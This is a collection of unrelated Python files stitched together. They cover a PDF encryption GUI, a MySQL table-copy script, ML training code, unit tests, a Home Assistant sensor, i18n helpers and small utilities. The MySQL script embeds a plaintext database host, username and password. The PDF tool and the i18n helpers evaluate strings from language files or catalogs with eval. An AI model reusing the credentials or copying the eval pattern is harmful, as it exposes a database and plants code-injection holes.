print(f'Error: File {lang_file} does not exist. Using default language English')
self.lang = default_lang
self.buttonChooseDir = QtWidgets.QPushButton(self.lang['select_dir'])
self.buttonStartEncrypting = QtWidgets.QPushButton(self.lang['add_pwd_protection'])
self.exitButton = QtWidgets.QPushButton(self.lang['quit'])
self.dirText = QtWidgets.QLabel(self.lang['no_dir_selected'])
self.infoText = QtWidgets.QLabel(self.lang['will_be_applied_to_zero'])
self.passwordText = QtWidgets.QLabel(self.lang['pwd'])
self.lineEditPassword = QtWidgets.QLineEdit(self)
self.checkBoxDecrypt = QtWidgets.QCheckBox(self.lang['remove_pwd_protection_checkbox'])
self.layout = QtWidgets.QVBoxLayout(self)
self.hbox1 = QtWidgets.QHBoxLayout()
self.hbox2 = QtWidgets.QHBoxLayout()
self.hbox3 = QtWidgets.QHBoxLayout()
self.layout.addLayout(self.hbox1)
self.hbox1.addWidget(self.buttonChooseDir)
self.hbox1.addWidget(self.dirText)
self.layout.addLayout(self.hbox2)
self.hbox2.addWidget(self.passwordText)
self.hbox2.addWidget(self.lineEditPassword)
self.layout.addLayout(self.hbox3)
self.hbox3.addWidget(self.checkBoxDecrypt)
self.hbox3.addWidget(self.buttonStartEncrypting)
self.layout.addWidget(self.infoText)
self.layout.addWidget(self.exitButton)
self.infoText.setWordWrap(True)
self.buttonChooseDir.clicked.connect(self.pickDirectory)
self.buttonStartEncrypting.clicked.connect(self.protectPdfs)
self.checkBoxDecrypt.stateChanged.connect(lambda: self.buttonStartEncrypting.setText(self.lang['remove_pwd_protection'] if self.checkBoxDecrypt.isChecked() else self.lang['add_pwd_protection']))
self.exitButton.clicked.connect(self.close)
self.directory = ''
self.pdfs = []
@QtCore.Slot()
def pickDirectory(self):
self.directory = str(QtWidgets.QFileDialog.getExistingDirectory(self, self.lang['select_dir']))
self.infoText.setText(self.lang['dirs_are_being_searched'])
self.infoText.repaint()
self.dirText.setText(self.directory)
self.pdfs = list(map(str, Path(self.directory).rglob('*.pdf')))
self.infoText.setText(self.eval_lang_string(self.lang['pdfs_were_found'], locals()))
@QtCore.Slot()
def protectPdfs(self):
password = self.lineEditPassword.text()
if not password:
print(self.lang['no_pwd_provided'])
self.infoText.setText(self.lang['no_pwd_provided'])
return
self.infoText.setText('')
infoText = ''
cnt = 0
for pdf_path in self.pdfs:
try:
if self.checkBoxDecrypt.isChecked():
pdf = Pdf.open(pdf_path, password=password)
pdf.save(pdf_path + '.tmp')
else:
pdf = Pdf.open(pdf_path)
pdf.save(pdf_path + '.tmp', encryption=Encryption(owner=password, user=password, R=4))
pdf.close()
os.remove(pdf_path)
os.rename(pdf_path + '.tmp', pdf_path)
modification = self.eval_lang_string(self.lang['pdfs_were_modified'], locals())
print(modification)
infoText += modification + '\n'
cnt += 1
except Exception as e:
error = self.eval_lang_string(self.lang['error_on_pdf_processing'], locals())
print(error)
print(e)
infoText += error + '\n'
infoText += self.eval_lang_string(self.lang['done'], locals())
self.infoText.setText(infoText)
def eval_lang_string(self, s, env=globals() | locals()):
return eval("f'" + s + "'", env)
default_lang = {
"select_dir":"Select directory",
"quit":"Quit",
"no_dir_selected":"No directory selected",
"will_be_applied_to_zero":"No PDFs will be modified",
"pwd":"Password:",
"add_pwd_protection":"Protect PDFs with password",
"remove_pwd_protection":"Remove passwords from PDFs",
"remove_pwd_protection_checkbox":"Remove password?",
"pdfs_were_found":"{str(len(self.pdfs))} PDFs were found",
"no_pwd_provided":"No password was specified",
"dirs_are_being_searched":"Directories are being searched",
"pdfs_were_modified":"PDF was {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"} ({pdf_path})",
"done":"Done: {cnt}/{len(self.pdfs)} PDFs were {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"}",
"error_on_pdf_processing":"An error occured while processing PDF {pdf_path}"
}
if __name__ == '__main__':
app = QtWidgets.QApplication([])
widget = ProtectPdfWindow()
widget.resize(400, 200)
widget.show()
sys.exit(app.exec())
|
nilq/baby-python
|
python
|
def remap( x, oMin, oMax, nMin, nMax ):
#range check
if oMin == oMax:
print("Warning: Zero input range")
return None
if nMin == nMax:
print("Warning: Zero output range")
return None
#check reversed input range
reverseInput = False
oldMin = min( oMin, oMax )
oldMax = max( oMin, oMax )
if not oldMin == oMin:
reverseInput = True
#check reversed output range
reverseOutput = False
newMin = min( nMin, nMax )
newMax = max( nMin, nMax )
if not newMin == nMin :
reverseOutput = True
portion = (x-oldMin)*(newMax-newMin)/(oldMax-oldMin)
if reverseInput:
portion = (oldMax-x)*(newMax-newMin)/(oldMax-oldMin)
result = portion + newMin
if reverseOutput:
result = newMax - portion
return int(result)
|
nilq/baby-python
|
python
|
import pandas as pd
import mysql.connector
import json
from pandas.io.json import json_normalize
from sqlalchemy import create_engine
import pymysql.cursors
import datetime
def connect():
""" Connect to MySQL database """
source = None
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
if source:
print('Connected to Source MySQL database')
except Error as e:
print(e)
def test():
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
df = pd.read_sql_query(" SELECT * FROM management_case ", source)
df['time'] =pd.to_timedelta(df['time'])
print(df['time'].head(10))
def read():
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
creds = {'usr': 'tonyho',
'pwd': 'zanik5dbkr',
'hst': '35.220.139.166',
'prt': 3306,
'dbn': 'osmosisdatatest1'}
connstr = 'mysql+mysqlconnector://{usr}:{pwd}@{hst}:{prt}/{dbn}'
engine = create_engine(connstr.format(**creds))
#df = pd.read_sql_query(" SELECT * FROM auth_user ", source)
#df.to_sql(con=engine, name='auth_user', if_exists='append', index=False)
#print("Auth_user work!")
#df = pd.read_sql_query(" SELECT * FROM authtoken_token ", source)
#df.to_sql(con=engine, name='authtoken_token', if_exists='append', index=False)
#print("authtoken_token!")
#df = pd.read_sql_query(" SELECT * FROM OneToOne_customer ", source)
#df.to_sql(con=engine, name='OneToOne_customer', if_exists='append', index=False)
#print("Customer work!")
#df = pd.read_sql_query(" SELECT * FROM management_product " , source)
#df.to_sql(con=engine, name='management_product', if_exists='append',index=False)
#print("Product work!")
#df = pd.read_sql_query(" SELECT * FROM management_technician ", source)
#df.to_sql(con=engine, name='management_technician', if_exists='append', index=False)
#print("Technician work!")
#df = pd.read_sql_query(" SELECT * FROM management_mainperiod ", source)
#df.to_sql(con=engine, name='management_mainperiod', if_exists='append', index=False)
#print("Main Period work!")
#df = pd.read_sql_query(" SELECT * FROM management_filter ", source)
#df.to_sql(con=engine, name='management_filter', if_exists='append', index=False)
#print("Filter work!")
#df = pd.read_sql_query(" SELECT * FROM management_case ", source , parse_dates=['time'])
#df['time'] = pd.DataFrame({'time': pd.to_timedelta(df['time'])})
#df['time'] = df['time'].astype('str')
#df.replace({'NaT': None}, inplace=True)
#df.to_sql(con=engine, name='management_case1', if_exists='append', index=False)
#print("Case work!")
df = pd.read_sql_query(" SELECT * FROM management_case_filters ", source)
df.to_sql(con=engine, name='management_case_filters1', if_exists='append', index=False)
print("Case Filter work!")
df = pd.read_sql_query(" SELECT * FROM management_case_machines ", source)
df.to_sql(con=engine, name='management_case_machines1', if_exists='append', index=False)
print("Case Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_machine ", source)
df.to_sql(con=engine, name='management_machine1', if_exists='append', index=False)
print("Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_mainpack ", source)
df.to_sql(con=engine, name='management_mainpack', if_exists='append', index=False)
print("Mainpack work!")
except Exception as e:
print(e)
if __name__ == '__main__':
connect()
read()
###test()
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import helper_functions.DataFrames as dfimport
def FillNaNWithCurrentDistribution(column, df):
'''
Input : The name of the column to witch the fillig strategy should be applied to,
plus the DataFrame object contanig the relevant data.
Output : The Pandas DataFrame object given as input. Containing the column where missing values have been supplanted,
by values based on the current distibition.
'''
data = df
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
#res_ser = pd.Series(data[column])
return data
def FillNaNWithCurrentDistributionFromCsv(column, csv):
'''
Input : The name of the column to witch the fillig strategy, for missing values, should be applied.
Plus the csv name the data should obtained from.
Output : A Pandas Series objected. Containing the column where missing values have been supplanted,
by values based on the current distibition.
'''
data = pd.DataFrame()
if csv.__eq__('listings.csv'):
data = dfimport.GetListingsDataFrame()
elif csv.__eq__('primary_data.csv'):
data = dfimport.GetPrimaryDataFrame()
elif csv.__eq__('secondary_data.csv'):
data = dfimport.GetSecondaryDataFrame()
else:
raise Exception('No data set with this name could be found!')
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
res_ser = pd.Series(data[column])
return res_ser
|
nilq/baby-python
|
python
|
################################################################################
# Copyright (C) 2013 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for bayespy.utils.linalg module.
"""
import numpy as np
from .. import misc
from .. import linalg
class TestDot(misc.TestCase):
def test_dot(self):
"""
Test dot product multiple multi-dimensional arrays.
"""
# If no arrays, return 0
self.assertAllClose(linalg.dot(),
0)
# If only one array, return itself
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]]),
[[1,2,3],
[4,5,6]])
# Basic test of two arrays: (2,3) * (3,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]]),
[[31,19],
[85,55]])
# Basic test of four arrays: (2,3) * (3,2) * (2,1) * (1,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]],
[[4],
[5]],
[[6,7]]),
[[1314,1533],
[3690,4305]])
# Test broadcasting: (2,2,2) * (2,2,2,2)
self.assertAllClose(linalg.dot([[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[9,1],
[2,3]],
[[4,5],
[6,7]]]]),
[[[[ 7, 10],
[ 15, 22]],
[[ 67, 78],
[ 91, 106]]],
[[[ 13, 7],
[ 35, 15]],
[[ 56, 67],
[ 76, 91]]]])
# Inconsistent shapes: (2,3) * (2,3)
self.assertRaises(ValueError,
linalg.dot,
[[1,2,3],
[4,5,6]],
[[1,2,3],
[4,5,6]])
# Other axes do not broadcast: (2,2,2) * (3,2,2)
self.assertRaises(ValueError,
linalg.dot,
[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[1,2],
[3,4]],
[[5,6],
[7,8]],
[[9,1],
[2,3]]])
# Do not broadcast matrix axes: (2,1) * (3,2)
self.assertRaises(ValueError,
linalg.dot,
[[1],
[2]],
[[1,2,3],
[4,5,6]])
# Do not accept less than 2-D arrays: (2) * (2,2)
self.assertRaises(ValueError,
linalg.dot,
[1,2],
[[1,2,3],
[4,5,6]])
class TestBandedSolve(misc.TestCase):
def test_block_banded_solve(self):
"""
Test the Gaussian elimination algorithm for block-banded matrices.
"""
#
# Create a block-banded matrix
#
# Number of blocks
N = 40
# Random sizes of the blocks
#D = np.random.randint(5, 10, size=N)
# Fixed sizes of the blocks
D = 5*np.ones(N, dtype=np.int)
# Some helpful variables to create the covariances
W = [np.random.randn(D[i], 2*D[i])
for i in range(N)]
# The diagonal blocks (covariances)
A = [np.dot(W[i], W[i].T) for i in range(N)]
# The superdiagonal blocks (cross-covariances)
B = [np.dot(W[i][:,-1:], W[i+1][:,:1].T) for i in range(N-1)]
C = misc.block_banded(A, B)
# Create the system to be solved: y=C*x
x_true = np.random.randn(np.sum(D))
y = np.dot(C, x_true)
x_true = np.reshape(x_true, (N, -1))
y = np.reshape(y, (N, -1))
#
# Run tests
#
# The correct inverse
invC = np.linalg.inv(C)
# Inverse from the function that is tested
(invA, invB, x, ldet) = linalg.block_banded_solve(np.asarray(A),
np.asarray(B),
np.asarray(y))
# Check that you get the correct number of blocks
self.assertEqual(len(invA), N)
self.assertEqual(len(invB), N-1)
# Check each block
i0 = 0
for i in range(N-1):
i1 = i0 + D[i]
i2 = i1 + D[i+1]
# Check diagonal block
self.assertTrue(np.allclose(invA[i], invC[i0:i1, i0:i1]))
# Check super-diagonal block
self.assertTrue(np.allclose(invB[i], invC[i0:i1, i1:i2]))
i0 = i1
# Check last block
self.assertTrue(np.allclose(invA[-1], invC[i0:, i0:]))
# Check the solution of the system
self.assertTrue(np.allclose(x_true, x))
# Check the log determinant
self.assertAlmostEqual(ldet/np.linalg.slogdet(C)[1], 1)
|
nilq/baby-python
|
python
|
# Taken from https://github.com/ojroques/garbled-circuit
import json
# HELPER FUNCTIONS
def parse_json(json_path):
with open(json_path) as json_file:
return json.load(json_file)
|
nilq/baby-python
|
python
|
"""Support the binary sensors of a BloomSky weather station."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.binary_sensor import (
PLATFORM_SCHEMA,
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.const import CONF_MONITORED_CONDITIONS
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from . import DOMAIN
SENSOR_TYPES = {"Rain": BinarySensorDeviceClass.MOISTURE, "Night": None}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
)
}
)
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the available BloomSky weather binary sensors."""
# Default needed in case of discovery
if discovery_info is not None:
return
sensors = config[CONF_MONITORED_CONDITIONS]
bloomsky = hass.data[DOMAIN]
for device in bloomsky.devices.values():
for variable in sensors:
add_entities([BloomSkySensor(bloomsky, device, variable)], True)
class BloomSkySensor(BinarySensorEntity):
"""Representation of a single binary sensor in a BloomSky device."""
def __init__(self, bs, device, sensor_name): # pylint: disable=invalid-name
"""Initialize a BloomSky binary sensor."""
self._bloomsky = bs
self._device_id = device["DeviceID"]
self._sensor_name = sensor_name
self._attr_name = f"{device['DeviceName']} {sensor_name}"
self._attr_unique_id = f"{self._device_id}-{sensor_name}"
self._attr_device_class = SENSOR_TYPES.get(sensor_name)
def update(self):
"""Request an update from the BloomSky API."""
self._bloomsky.refresh_devices()
self._attr_is_on = self._bloomsky.devices[self._device_id]["Data"][
self._sensor_name
]
|
nilq/baby-python
|
python
|
import pygame
from buttons.image_button import ImageButton
class CardComponent:
def __init__(self, screen, x, y, suit, value):
self.flipped = False
self.value = value
self.suit = suit
card_image = f"assets/{value}_{suit}.png"
self.card = ImageButton(screen, x, y, card_image, 0.5)
self.back_card = ImageButton(screen, x, y, "assets/back_red.png", 0.5)
self.hold = False
def draw(self):
if self.flipped == True:
self.back_card.draw()
else:
self.card.draw()
def flip(self):
self.flipped = not self.flipped
def getFlipped(self):
return self.flipped
def moveCard(self, x, y):
self.card.move(x, y)
def flipHold(self):
self.hold = not self.hold
def getHold(self):
return self.hold
def collides(self, pos):
return self.card.collides(pos) or self.back_card.collides(pos)
|
nilq/baby-python
|
python
|
import os
import time
import torch
import argparse
import torchvision
import torch.nn as nn
import torch.utils.data
import torch.optim as optim
import torchvision.transforms as transforms
from utils.function import *
from model.SE import SEresnet, loss_fn_kd
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR10
best_prec1 = 0
def main(args):
global best_prec1
# CIFAR-10 Training & Test Transformation
print('. . . . . . . . . . . . . . . .PREPROCESSING DATA . . . . . . . . . . . . . . . .')
TRAIN_transform = transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
if args.cutout :
TRAIN_transform.transforms.append(Cutout(n_masks = args.n_masks, length = args.length))
VAL_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
# CIFAR-10 dataset
train_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = True,
transform = TRAIN_transform,
download = True)
val_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = False,
transform = VAL_transform,
download = True)
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
pin_memory = True,
drop_last = True,
batch_size = args.batch_size ,
shuffle=True)
val_loader = torch.utils.data.DataLoader(dataset=val_dataset,
pin_memory = True,
batch_size = args.batch_size ,
shuffle=False)
# Device Config
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = SEresnet()
model = model.to(device)
criterion = nn.CrossEntropyLoss().to(device)
optimizer = optim.SGD(model.parameters() , lr = args.lr , weight_decay = args.weight_decay, momentum = args.momentum)
lr_schedule = lr_scheduler.MultiStepLR(optimizer, milestones = [250,375], gamma = 0.1)
if args.evaluate :
model.load_state_dict(torch.load('./save_model/model.pt'))
model.to(device)
validation(args, val_loader, model, criterion)
# Epoch = args.Epoch
for epoch_ in range(0, args.Epoch):
print('current lr {:.5e}'.format(optimizer.param_groups[0]['lr']))
if args.KD == True:
teacher_model = SEresnet().to(device)
teacher_checkpoint = './save_model/teacher_model.pt'
load_checkpoint(teacher_checkpoint, teacher_model)
train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_)
else:
train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_)
lr_schedule.step()
prec1 = validation(args, val_loader, model, criterion)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
if epoch_ > 0 and epoch_ % args.save_every == 0:
save_checkpoint({
'epoch': epoch_ + 1,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'checkpoint.pt'))
save_checkpoint({
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'model.pt'))
# torch.save({
# 'epoch': epoch,
# 'model_state_dict': model.state_dict(),
# 'optimizer_state_dict': optimizer.state_dict(),
# 'loss': loss,
# })
print('THE BEST MODEL prec@1 : {best_prec1:.3f} saved. '.format(best_prec1 = best_prec1))
def train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# output = output.float()
# loss = loss.float()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
def validation(args, val_loader, model, criterion):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input_, target) in enumerate(val_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
# loss = loss.float()
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
return top1.avg
def train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
teacher_model.eval()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_ = input_.to(device)
target = target.to(device)
output_teacher = teacher_model(input_)
output = model(input_)
# loss = criterion(output, target)
loss = loss_fn_kd(output, target, output_teacher)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
|
nilq/baby-python
|
python
|
# Parent Class
class Shape:
sname = "Shape"
def getName(self):
return self.sname
# child class
class XShape(Shape):
# initializer
def __init__(self, name):
self.xsname = name
def getName(self): # overriden method
return (super().getName() + ", " + self.xsname)
circle = XShape("Circle")
print(circle.getName())
|
nilq/baby-python
|
python
|
# encoding: utf8
from __future__ import print_function, unicode_literals
from io import BytesIO
import re
from unicodedata import combining, normalize
from aspen.resources.pagination import parse_specline, split_and_escape
from aspen.utils import utcnow
from babel.core import LOCALE_ALIASES
from babel.dates import format_timedelta
from babel.messages.extract import extract_python
from babel.numbers import (
format_currency, format_decimal, format_number, format_percent,
get_decimal_symbol, parse_decimal
)
import jinja2.ext
ALIASES = {k: v.lower() for k, v in LOCALE_ALIASES.items()}
ALIASES_R = {v: k for k, v in ALIASES.items()}
ternary_re = re.compile(r'^\(? *(.+?) *\? *(.+?) *: *(.+?) *\)?$')
and_re = re.compile(r' *&& *')
or_re = re.compile(r' *\|\| *')
def ternary_sub(m):
g1, g2, g3 = m.groups()
return '%s if %s else %s' % (g2, g1, ternary_re.sub(ternary_sub, g3))
def get_function_from_rule(rule):
rule = ternary_re.sub(ternary_sub, rule.strip())
rule = and_re.sub(' and ', rule)
rule = or_re.sub(' or ', rule)
return eval('lambda n: ' + rule, {'__builtins__': {}})
def get_text(request, loc, s, *a, **kw):
msg = loc.catalog.get(s)
if msg:
s = msg.string or s
if a or kw:
if isinstance(s, bytes):
s = s.decode('ascii')
return s.format(*a, **kw)
return s
def n_get_text(website, request, loc, s, p, n, *a, **kw):
n = n or 0
msg = loc.catalog.get((s, p))
s2 = None
if msg:
try:
s2 = msg.string[loc.catalog.plural_func(n)]
except Exception as e:
website.tell_sentry(e, request)
if s2 is None:
loc = 'en'
s2 = s if n == 1 else p
kw['n'] = format_number(n, locale=loc) or n
if isinstance(s2, bytes):
s2 = s2.decode('ascii')
return s2.format(*a, **kw)
def to_age(dt, loc):
return format_timedelta(dt - utcnow(), add_direction=True, locale=loc)
def regularize_locale(loc):
if loc == 'no':
# There are two forms of written Norwegian, Bokmål and Nynorsk, and
# while ISO 639 includes `no` as a "macrolanguage", the CLDR (upon
# which Babel, our i18n/l10n library, depends), does not include it at
# all. Therefore, if a client sends `no` we interpret it as `nb_NO`.
loc = 'nb_NO'
return loc.replace('-', '_').lower()
def regularize_locales(locales):
"""Yield locale strings in the same format as they are in website.locales.
"""
locales = [regularize_locale(loc) for loc in locales]
locales_set = set(locales)
for loc in locales:
yield loc
parts = loc.split('_')
if len(parts) > 1 and parts[0] not in locales_set:
# Insert "fr" after "fr_fr" if it's not somewhere in the list
yield parts[0]
alias = ALIASES.get(loc)
if alias and alias not in locales_set:
# Insert "fr_fr" after "fr" if it's not somewhere in the list
yield alias
def strip_accents(s):
return ''.join(c for c in normalize('NFKD', s) if not combining(c))
def get_locale_for_request(request, website):
accept_lang = request.headers.get("Accept-Language", "")
languages = (lang.split(";", 1)[0] for lang in accept_lang.split(","))
languages = request.accept_langs = regularize_locales(languages)
for lang in languages:
loc = website.locales.get(lang)
if loc:
return loc
return website.locale_en
def format_currency_with_options(number, currency, locale='en', trailing_zeroes=True):
s = format_currency(number, currency, locale=locale)
if not trailing_zeroes:
s = s.replace(get_decimal_symbol(locale)+'00', '')
return s
def add_helpers_to_context(website, request):
context = request.context
loc = context['locale'] = get_locale_for_request(request, website)
context['decimal_symbol'] = get_decimal_symbol(locale=loc)
context['_'] = lambda s, *a, **kw: get_text(request, loc, s, *a, **kw)
context['ngettext'] = lambda *a, **kw: n_get_text(website, request, loc, *a, **kw)
context['format_number'] = lambda *a: format_number(*a, locale=loc)
context['format_decimal'] = lambda *a: format_decimal(*a, locale=loc)
context['format_currency'] = lambda *a, **kw: format_currency_with_options(*a, locale=loc, **kw)
context['format_percent'] = lambda *a: format_percent(*a, locale=loc)
context['parse_decimal'] = lambda *a: parse_decimal(*a, locale=loc)
def _to_age(delta):
try:
return to_age(delta, loc)
except:
return to_age(delta, 'en')
context['to_age'] = _to_age
def extract_spt(fileobj, *args, **kw):
pages = list(split_and_escape(fileobj.read()))
npages = len(pages)
for i, page in enumerate(pages, 1):
f = BytesIO(b'\n' * page.offset + page.content)
content_type, renderer = parse_specline(page.header)
extractor = None
if (i == npages and not page.header) or content_type == 'text/html' or renderer == 'jinja2':
extractor = jinja2.ext.babel_extract
elif i < 3:
extractor = extract_python
if extractor:
for match in extractor(f, *args, **kw):
yield match
|
nilq/baby-python
|
python
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
from vissl.utils.hydra_config import compose_hydra_configuration, convert_to_attrdict
from vissl.utils.test_utils import (
gpu_test,
in_temporary_directory,
run_integration_test,
)
class TestRegnet10B(unittest.TestCase):
@staticmethod
def _create_10B_pretrain_config(num_gpus: int, num_steps: int, batch_size: int):
data_limit = num_steps * batch_size * num_gpus
cfg = compose_hydra_configuration(
[
"config=pretrain/swav/swav_8node_resnet",
"+config/pretrain/seer/models=regnet10B",
"config.OPTIMIZER.num_epochs=1",
"config.LOG_FREQUENCY=1",
# Testing on fake images
"config.DATA.TRAIN.DATA_SOURCES=[synthetic]",
"config.DATA.TRAIN.RANDOM_SYNTHETIC_IMAGES=True",
"config.DATA.TRAIN.USE_DEBUGGING_SAMPLER=True",
# Disable overlap communication and computation for test
"config.MODEL.FSDP_CONFIG.FORCE_SYNC_CUDA=True",
# Testing on 8 V100 32GB GPU only
f"config.DATA.TRAIN.BATCHSIZE_PER_REPLICA={batch_size}",
f"config.DATA.TRAIN.DATA_LIMIT={data_limit}",
"config.DISTRIBUTED.NUM_NODES=1",
f"config.DISTRIBUTED.NUM_PROC_PER_NODE={num_gpus}",
"config.DISTRIBUTED.RUN_ID=auto",
]
)
args, config = convert_to_attrdict(cfg)
return config
@gpu_test(gpu_count=8)
def test_regnet_10b_swav_pretraining(self):
with in_temporary_directory():
config = self._create_10B_pretrain_config(
num_gpus=8, num_steps=2, batch_size=4
)
results = run_integration_test(config)
losses = results.get_losses()
print(losses)
self.assertEqual(len(losses), 2)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# coding:utf-8
def fib(n):
yield 0
x, y = 0, 1
yield x
for i in range(n-1):
x, y = y, x + y
yield x
'''
fib() 可以简化
简化 1
def fib(n):
x, y = 0, 1
for i in range(n):
yield x
x, y = y, x + y
简化 2
def fib(n):
x, y = 0, 1
for i in range(n-1):
x, y = y, x + y
yield x
'''
n = int(input("Please enter a number: "))
fib_lst = []
for i in fib(n):
fib_lst.append(i)
print("\nNo.{0} Fibonacci number is {1}.".format(n, fib_lst[-1]))
'''
yield 表达式在定义生成器函数或异步生成器函数时使用,并且只能在函数定义的主体中使用
在函数体中使用 yield 表达式会使得该函数成为生成器
官网找的例子
>>> def echo(value=None):
... print("Execution starts when 'next()' is called for the first time.")
... try:
... while True:
... try:
... value = (yield value)
... except Exception as e:
... value = e
... finally:
... print("Don't forget to clean up when 'close()' is called.")
...
>>> generator = echo(1)
>>> print(next(generator))
Execution starts when 'next()' is called for the first time.
1
>>> print(next(generator))
None
>>> print(generator.send(2))
2
>>> generator.throw(TypeError, "spam")
TypeError('spam',)
>>> generator.close()
Don't forget to clean up when 'close()' is called.
'''
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (c) 2013 Qin Xuye <qin@qinxuye.me>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on 2014-4-27
@author: chine
'''
import os
import threading
try:
import cPickle as pickle
except ImportError:
import pickle
from collections import defaultdict
import socket
from cola.core.rpc import client_call
from cola.core.utils import get_rpc_prefix
from cola.core.mq.store import Store
from cola.core.mq.distributor import Distributor
